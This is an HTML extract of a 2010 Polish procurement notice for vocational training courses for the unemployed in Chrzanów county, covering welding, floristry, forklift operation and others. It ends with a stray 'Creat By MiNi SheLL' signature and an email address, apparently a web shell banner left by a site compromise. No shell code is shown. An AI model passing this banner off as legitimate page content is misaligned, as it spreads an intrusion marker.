II gr. - lipiec,
 III gr. - wrzesień,  
IV gr. - listopad 


5.Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Spawacz Mag + Tig.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: Przeprowadzenie szkolenia  dla  20 osób ( podzielonych na 2 grupy 10 osobowe)  w specjalności : Spawacz Mag + Tig 

2.  Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.. 

3. Program szkolenia powinien obejmowa min. 230 godzin dydaktycznych i być zgodny z wytycznymi Instytutu Spawalnictwa w Gliwicach. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia.

4. Termin realizacji szkolenia: 

I gr. -  czerwiec  / lipiec 2010; 
II gr. -  wrzesień/październik 2010.

5. Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216). 

Po pozytywnym zaliczeniu egzaminu uczestnicy otrzymają także Świadectwo Egzaminu Kwalifikacyjnego Spawacza wystawionego przez Instytut Spawalnictwa oraz Książeczkę Spawacza..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 38.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Agroturystyka z elementami  przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób bezrobotnych  w specjalności: Agroturystyka z elementami  przedsiębiorczości 

2.Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 

3.Program szkolenia powinien obejmować     200  godzin dydaktycznych i zawierać następujące moduły:
1)	Rys historyczny, stan oraz możliwości rozwoju turystyki w Polsce 
2)	Podstawowe pojęcia dotyczące agroturystyki 
3)	Prawne wymagania w agroturystyce 
4)	Elementy ochrony środowiska 
5)	Walory przyrodnicze i kulturalne regionów polskich  oraz ich wykorzystanie w usługach agroturystycznych 
6)	Baza noclegowa na terenach wiejskich ( rodzaje zakwaterowania, kategoryzacja wiejskiej bazy noclegowej) 
7)	Savoir - vivre w świadczeniu usług agroturystycznych 
8)	Profesjonalna obsługa klienta 
9)	Skuteczna promocja czyli jak wyróżnić się na tle konkurencji 
10)	Podstawy przedsiębiorczości 
11)	Podstawy księgowości ( formy opodatkowania, metody prowadzenia księgowości) 
12)	Szkolenie BHP , zarys HACCP
13)	Podstawy prawa pracy 
14)	System  kwalifikacji i kategoryzacji wiejskiej bazy noclegowej ( wymagania obowiązujące w UE) 
15)	Formy i sposoby aktywizowania mieszkańców wsi do prowadzenia działalności gospodarczej 
16)	Opracowanie przykładowego biznes planu  oraz analiza SWOT
17)	Zajęcia praktyczne w terenie czyli zwiedzanie gospodarstw agroturystycznych 
18)	Czynności związane z rozpoczynaniem działalności gospodarczej 
19)	Elementy prawa gospodarczego 
20)	System podatkowy w Polsce i formy ewidencji podatkowej 
21)	Podstawy marketingu 
22)	Podstawy negocjacji 
23)	Formy wsparcia dla przedsiębiorców i osób rozpoczynających działalność gospodarczą 
24)	Prowadzenie rozliczeń z ZUS 
25)	Analiza sytuacyjna przedsiębiorstwa 

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 


W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone
 o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia. Ogólna liczba godzin nie  może przekroczyć 200. 




4.	 Termin realizacji szkolenia: czerwiec / lipiec 2010


5.	Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 33.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Specjalista ds. pozyskiwania środków unijnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  20  osób bezrobotnych  w specjalności: Specjalista ds. pozyskiwania środków unijnych

2.Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 


3.Program szkolenia powinien obejmować  120  godzin dydaktycznych i zawierać następujące moduły:
1.	System programowania 2007-2013, strategia na poziomie Unii Europejskiej oraz narodowe strategie i założenia
2.	Źródła pozyskiwania informacji o konkursach 
3.	Zasady budowania projektu: matryca logiczna, wypełnianie wniosku aplikacyjnego: 
4.	Zasady finansowania projektów: kwalifikowalność kosztów, montaż finansowy,
5.	Prawo zamówień publicznych w procesie przygotowania i wdrażania projektu 
6.	Zarządzanie projektem
7.	Sprawozdawczość, monitoring i ewaluacja projektu
8.	Europejskie źródła finansowania dla organizacji pozarządowych, jednostek samorządu terytorialnego, sektora prywatnego
9.	Warsztaty projektowe  - komputerowe sporządzanie wniosków.

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 50%. 


W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone 
o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia. Ogólna liczba godzin nie  może przekroczyć 120. 


4.	 Termin realizacji szkolenia: 

                     Czerwiec - Lipiec   2010 

5.	Sposób realizacji szkolenia:

W przypadku zajęć praktycznych na komputerach grupa uczestników  nie może liczyć więcej niż 10 uczestników.  

6.	Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Florystyka z obsługą kasy fiskalnej i elementami prowadzenia własnej firmy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  20  osób bezrobotnych  w specjalności: Florystyka z obsługą kasy fiskalnej i elementami prowadzenia własnej firmy. 

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 


3.	Program szkolenia powinien obejmować     160  godzin dydaktycznych i zawierać następujące moduły:
a)	Fizjologiczne podstawy kwitnienia i starzenia się kwiatów.
b)	Style w kompozycjach.
c)	Florystyka ślubna.
d)	Florystyka żałobna.
e)	Projektowanie i wykonywanie kwiatowych aranżacji wnętrz.
f)	Zasady układania kompozycji, ikeban.
g)	Wykonywanie stelaży i wykorzystywanie ich w bukietach okolicznościowych.
h)	Zagadnienia komercyjne w sferze handlu kwiatami.
i)	Moduł ABC własnej firmy 
j)	Obsługa kasy fiskalnej,
k)	Zajęcia praktyczne.

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%. 


W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia. Ogólna liczba godzin nie  może przekroczyć 160. 


4.	 Termin realizacji szkolenia: 

                     Czerwiec - Lipiec   2010 

5.	Sposób realizacji szkolenia:

W przypadku zajęć praktycznych grupa uczestników  nie może liczyć więcej niż 10 uczestników.  

6.	Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 26.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Nowoczesny sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  20  osób bezrobotnych ( podzielonych na dwie grupy 10 osobowe)   w specjalności: Nowoczesny sprzedawca.

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia. 


3.	Program szkolenia powinien obejmować  120  godzin dydaktycznych i zawierać następujące moduły:
1.	Autoprezentacja
2.	Obsługa klienta
3.	Nowoczesne techniki sprzedaży:
-Proces sprzedaży ( ścieżka sprzedaży, poszukiwanie potencjalnych klientów, zdobywanie informacji o firmie klienta)
-Handlowa rozmowa telefoniczna
-Bezpośrednie spotkanie handlowe
-Określenie potrzeb klienta ( umiejętność prowadzenia wywiadu z klientem, odkrywanie i wzmacnianie motywacji do zakupu)
-Prezentacja handlowa
-Zamknięcie sprzedaży
-Wykorzystanie Internetu w handlu
-Dekorowanie wnętrza sklepu i okna wystawowego
4.Negocjacje handlowe
5.	Komputerowa obsługa magazynu
6.	Komputerowy system obsługi sprzedaży - program SUBIEKT 
7.	Obsługa kasy fiskalnej 
8.	Podstawowe zasady higieny ( system HACCP) 

Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%. 


W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych  dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.

Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone 
o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia. Ogólna liczba godzin nie  może przekroczyć 120. 

4.	 Termin realizacji szkolenia: 

                     I grupa : Czerwiec - Lipiec   2010 

                     II grupa: Październik - Listopad 2010

5.	Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U Nr.31 poz.216)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie - 0.20</li>
<li>3. Posiadanie certyfikatów jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Obsługa wózka widłowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: przeprowadzenie szkolenia dla  36  osób bezrobotnych ( podzielonych na trzy grupy 12 osobowe)   w specjalności:  Obsługa wózka widłowego.  

2. Miejsce organizacji szkolenia:  powiat chrzanowski.


W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia.. 


3.Program szkolenia powinien obejmować  min.    67 godzin dydaktycznych. 

Szkolenie powinno  być przeprowadzone w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych 
z napędem silnikowym ( Dz. U nr 70, poz. 650 z późn. zm.)  tj. Ośrodek Doskonalenia Kadr w Mysłowicach. 

4.	 Termin realizacji szkolenia: 

                     I grupa : Czerwiec / Lipiec 2010 

                     II grupa:  Sierpień / wrzesień  2010

                    III grupa  - Październik  2010

5.	Inne postanowienia:

Szkolenie zakończy się egzaminem  wewnętrznym sprawdzającym nabyte przez słuchaczy umiejętności oraz wydaniem dokumentów świadczących  o ukończeniu szkolenia ( zaświadczeń, świadectw, certyfikatów itp. ) W/w dokumenty mają być wydane zgodnie   z Rozporządzeniem Ministra Edukacji i Nauki   z dnia 3 lutego 2006r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U.  Nr.31 poz.216). 

Ponadto w ramach szkolenia uczestnicy muszą przystąpić do egzaminu, którego celem jest uzyskanie zaświadczenia kwalifikacyjnego do obsługi wózków jezdniowych wystawionego przez Urząd Dozoru Technicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 15.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com